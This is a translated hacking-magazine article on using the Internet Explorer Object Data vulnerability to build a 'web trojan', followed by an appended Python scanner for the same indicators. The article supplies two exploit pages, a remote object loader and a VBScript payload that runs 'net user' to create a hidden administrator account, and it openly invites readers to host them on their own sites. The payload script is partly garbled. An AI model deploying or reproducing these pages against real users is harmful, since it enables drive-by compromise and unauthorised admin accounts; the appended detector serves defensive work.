Originally published in Hacker X Files No. 8; copyright belongs to the magazine.
Making a new web * using Internet Explorer Object Data vulnerability
lcx
On August 20 this year, Microsoft announced an important vulnerability rated at the highest severity level: the Internet Explorer Object Data remote code execution vulnerability. This is good news for web * enthusiasts, because the flaw can be used to build a brand new * that will not be detected for the time being. Before explaining how to make this new web *, I will briefly introduce the vulnerability itself.
1. Vulnerability description
The vulnerability was discovered by eEye Digital Security and published on August 20; Microsoft issued a corresponding bulletin on the same day. The eEye advisory page (/html/Research/Advisories/) describes it roughly as follows. Microsoft Internet Explorer is a popular web browser. When it processes "Object" tags, Internet Explorer does not correctly handle the parameters of the file to be loaded.
The "Object" tag is used to embed objects such as ActiveX components in HTML pages. Its "Type" attribute sets or gets the MIME type of the object; valid MIME types include "text/plain", "application/hta", "audio/x-mpeg" and so on. When the Object tag's data attribute points to a remote location, Internet Explorer loads the file without sufficiently checking its attributes. An attacker can therefore build a malicious page and lure users into visiting it, causing a program specified by that page to run. On Windows 2003, Internet Explorer runs in "Enhanced Security Configuration" mode with ActiveX disabled by default, so the severity of this vulnerability for IE on Windows 2003 is rated medium.
This description is rather technical; novices who do not follow it can skip it and go straight to how the * is made. :-)
2. Affected system versions
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0SP1
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000
3. Detailed exploitation method
Following the hints on that page (/html/Research/Advisories/), I wrote two simple test pages. Please read the code and comments first; I will explain them afterwards.
--------------------------------------------------------------------------------------------------------------------------------
<html>
<body>
This is a test page. If your system is w2k or xp, a user named lcx with password lcxlcx will be added after you visit it.
<object data="http://127.0.0.1/"></object>
<!-- This calls the malicious page. I tested it locally and placed that page in the root directory of my IIS, so the URL is http://127.0.0.1/; if you want to use this code, change http://127.0.0.1/ to http://your url/ on your own network. -->
</body>
</html>
--------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------
<html>
<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>
<script language=vbscript>
set wshshell=createobject ("" )
a= (" /c net user lcx lcxlcx /add",0)
b= (" /c net localgroup Administrators lcx /add",0)
'This adds a user named lcx with password lcxlcx and puts it in the Administrators group. You should understand this VBS.
</script>
</html>
--------------------------------------------------------------------------------------------------------------------------------
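As an added defensive example (not from the article or the magazine), the following Python scanner flags the three indicators the two test pages above exhibit: an Object tag whose data attribute fetches a remote URL, an Object that instantiates WScript.Shell through the CLSID shown on the page, and a VBScript block that drives net user / net localgroup. The sample pages inside the block are constructed, modelled on the article's pages and on a benign typed embed of the kind section 1 describes.

```python
import re

# CLSID embedded by the page's second test page; it instantiates the
# Windows Script Host Shell object (WScript.Shell).
WSH_SHELL_CLSID = "f935dc22-1cf0-11d0-adb9-00c04fd58a0b"

OBJECT_TAG = re.compile(r"<object\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
VBS_NET_CMD = re.compile(
    r"<script\b[^>]*language\s*=\s*['\"]?vbscript.*?\bnet\s+(?:user|localgroup)\b",
    re.IGNORECASE | re.DOTALL)

def parse_attrs(raw):
    """Turn the inside of a tag into a lowercase-name -> value dict."""
    attrs = {}
    for m in ATTR.finditer(raw):
        attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
    return attrs

def scan_html(html):
    """Return the indicators found; an empty list means nothing matched."""
    findings = []
    for m in OBJECT_TAG.finditer(html):
        attrs = parse_attrs(m.group(1))
        data = attrs.get("data", "")
        # The loader page: an Object whose data attribute fetches a remote URL.
        if re.match(r"https?://", data, re.IGNORECASE):
            findings.append("remote-object-data:" + data)
        # The payload page: an Object instantiating WScript.Shell by CLSID.
        clsid = attrs.get("classid", "").lower().replace("clsid:", "")
        if clsid == WSH_SHELL_CLSID:
            findings.append("wscript-shell-clsid")
    # VBScript that drives 'net user' / 'net localgroup' (account manipulation).
    if VBS_NET_CMD.search(html):
        findings.append("vbscript-net-user")
    return findings

# Constructed samples modelled on the page's two test pages and on a benign embed.
LOADER_SAMPLE = '<html><body><object data="http://127.0.0.1/"></object></body></html>'
PAYLOAD_SAMPLE = (
    '<html><object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>'
    '<script language=vbscript>\na= (" /c net user test test /add",0)\n</script></html>')
BENIGN_SAMPLE = '<object data="movie.swf" type="application/x-shockwave-flash"></object>'

if __name__ == "__main__":
    for name, page in [("loader", LOADER_SAMPLE), ("payload", PAYLOAD_SAMPLE),
                       ("benign", BENIGN_SAMPLE)]:
        print(name, scan_html(page) or "clean")
```

Run against saved HTML from a web proxy or mail gateway, the benign Flash embed produces no findings while each of the two test-page shapes is flagged separately, so the loader can be caught even when the payload page is hosted elsewhere.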